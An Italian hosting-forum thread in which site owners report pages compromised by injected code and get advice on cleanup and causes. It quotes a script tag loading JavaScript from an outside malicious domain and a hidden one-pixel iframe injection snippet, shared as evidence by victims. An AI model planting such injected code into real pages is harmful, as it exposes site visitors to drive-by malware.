Il mio sito segnalato malevolo: iframe in body

[ggmpellegrina]

Ciao!

Vorrei segnalare che al mio sito (solo nella homepage) è stato aggiunto un tag iframe nel body, per cui al caricamento avrebbe eseguito codice javascript indesiderato.
Ho cambiato la pass e ripristinato una vecchia versione della homepage.

Vi segnalo il fatto, sperando che serva d'aiuto ad altri utenti.


Saluti
GGMP

[dapeco]

Hai anche eseguito un'approfondita scansione del tuo sistema con un buon antivirus aggiornato?

[ggmpellegrina]

Ovviamente sì, grazie :D

Ritenevo di doverlo segnalare, magari non sono l'unico a cui è successo.
Sto aspettando il nullaosta di Google, senza di cui non me ne sarei mai accorto finchè non fosse stato troppo tardi.

[fabkawa]

Anche a me succede la stessa cosa ed andando ad analizzare cosa succede, mi sono accorto che anche senza aprire le pagine, il codice html viene modificato e viene aggiunto del codice
oggi era questo:
<script src=http://connis-guzzi-shop.de/Master/20AL.php >

questo codice non è sempre lo stesso ed all'inizio ho pensato fosse causato dal mio editor html, poi ho verificato che la copia sul mio hard disk non ha questo codice (che si inserisce all aprima riga della head) ho effettuato le correzioni sui file utilizzando l'editor di testo sul pannello di controllo ed ho rimosso il codice malevolo.
il giorno successivo (oggi) è apparso nuovamente anche se con destinazione diversa.

proverò a cambiare la password ma non credo dipenda da questo

grazie per l'attenzione

[ggmpellegrina]

Il mio codice "cattivo" era sempre uno script javascript, ma era più lungo (purtroppo nella rabbia del momento non ho pensato a salvarlo per postarlo).
Rileggendo la tua descrizione, in effetti è possibile che anche il tuo sia più lungo:
tra "<script src=http://connis-guzzi-shop.de/Master/20AL.php >" e il successivon tag di chiusura "</script>", se presente, può esser tutto spazzatura...

Io cambiando pass ho risolto.

Per velocizzare la procedura di "riabilitazione" da parte di google, ti consiglio gli strumenti per webmaster a disposizione
qui. (ovviamente dopo che hai cambiato pass e rimosso il codice dannoso)

Serve un account google, che ti puoi creare velocemente se già non lo hai.
Segui la parte evidenziata in rosso (che ti quantifica anche le pagine infette), richiedi un nuovo controllo e dopo poche ore sarai nuovamente in pista!

[ggmpellegrina]

Ho trovato in un vecchio file di backup in cui è presente il codice in questione.

Codice:

<script>
var jojo = document.createElement('iframe');
jojo.setAttribute('width', '1');
jojo.setAttribute('height', '1');
jojo.setAttribute('style', 'display:none');
jojo.setAttribute('src', <omissis>);
document.body.appendChild(jojo);
</script>

Ad un mio amico (http://www.diglo.altervista.org) è successa la stessa cosa: al caricamento al posto della homepage si è ritrovato un link ad un sito diverso.
Anche lui non ha virus sul pc e aveva come password quella generata da altervista, cambiata spesso.

La mia domanda resta: come è possibile che questi antipatici piratucoli riescano ad inserire del codice nelle nostre pagine, anche senza scoprire le password?!?!?
Può essere una falla nel sistema di altervista, o no?

Io usando ubuntu sono al sicuro da questi virus? Il genere di sito che sto creando è un sito che anche con pochi utenti comunque avrebbe abbastanza visite uniche/giorno, e quindi non vorrei avere sulla "coscienza" migliaia di persone.

[Gianluca]

Normalmente non si tratta di persone che vanno manualmente ad inserire tale codice, ma piuttosto di worm, che in maniera automatica possono:

a) Iniettare il codice nei layout usando falle note di applicativi
b) Utilizzare le password che trovano nella cache dei client FTP, piuttosto che nella mail, per caricare il tutto sugli spazi web

Non sempre tali worm sono individuati dai più comuni antivirus, anche se è comunque importante avere uno sempre aggiornato.

Il cambio frequente della propria password è certamente utile, come anche il mantenere sempre aggiornato il proprio pc, specialmente i browser che si usano.

[ggmpellegrina]

Ok, grazie per l'attenzione e per le dritte :D

Saluti a tutti!